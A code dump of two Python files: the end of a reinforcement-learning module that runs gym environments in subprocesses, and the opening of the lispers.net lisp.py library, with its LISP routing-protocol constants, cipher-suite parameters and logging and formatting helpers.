remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.action_space, env.observation_space))
else:
raise NotImplementedError
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns):
"""
envs: list of gym environments to run in subprocesses
"""
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, CloudpickleWrapper(env_fn)))
for (work_remote, env_fn) in zip(self.work_remotes, env_fns)]
for p in self.ps:
p.start()
self.remotes[0].send(('get_spaces', None))
self.action_space, self.observation_space = self.remotes[0].recv()
def step(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
results = [remote.recv() for remote in self.remotes]
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
@property
def num_envs(self):
return len(self.remotes)
# Create the environment.
def make(env_name, num_processes):
envs = SubprocVecEnv([
make_env(env_name, 1337, i) for i in range(num_processes)
])
return envs
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by a instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time creates the g, p, and public-key values. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests. When the process
# starts up or the map-cache is cleared by user we don't do rate-limiting for
# 1 minute so we can load up the cache quicker.
#
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll has the first long of a ICMP echo-request and
# echo-reply for testing purposes. To show per packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}
#
# Used to stare NAT translated address state in an RTR when a ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error proessing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# site behind a NAT device.
#
# Dictiionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values eid-prefix, group-prefix and rloc-prefix is
# lisp_address() so longest match lookups can be performed. The instance-id
# value is an array of 2 elements that store same value in both elements if
# not a range or the low and high range values.
#
lisp_glean_mappings = []
#
# Gleaned groups data structure. Used to find all (S,G) and (*,G) the gleaned
# EID has joined. This data structure will be used to time out entries that
# have stopped joining. In which case, the RLE is removed from the (S,G) or
# (*,G) that join timed out.
#
# The dictionary array is indexed by "[<iid>]<eid>" and the value field is a
# dictoinary array indexed by group address string. The value of the nested
# dictionay array is a timestamp. When EID 1.1.1.1 has joined groups 224.1.1.1,
# and 224.2.2.2, here is how timestamp 1111 and 2222 are stored.
#
# >>> lisp_gleaned_groups = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"] = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.1.1.1"] = 1111
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.2.2.2"] = 2222
# >>> lisp_gleaned_groups
# {'[1539]1.1.1.1': {'224.2.2.2': 2222, '224.1.1.1': 1111}}
#
lisp_gleaned_groups = {}
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_TEST_MR_INTERVAL = 60 # In units of seconds, 1 minute
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = .5 # In units of seconds, 500 ms
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60 # In units of seconds, 1 minute
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180 # In units of seconds, 3 minutes
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Apline Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = commands.getoutput("sudo dmidecode -s bios-vendor")
if (vm.find("command not found") != -1 and lisp_on_docker()):
aws = bold("AWS check", False)
lprint("{} - dmidecode not installed in docker container".format(aws))
#endif
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_on_docker
#
# Are we in a docker container?
#
def lisp_on_docker():
return(os.path.exists("/.dockerenv"))
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args:
if (arg == "force"): continue
print arg,
#endfor
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# fprint
#
# Do a lprint() when debug logging is off but "force" flag is supplied and
# can print messages..
#
def fprint(*args):
nargs = args + ("force",)
lprint(*nargs)
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_caller
#
# Print out calling stack.
#
def lisp_print_caller():
fprint(traceback.print_last())
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text baesd bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
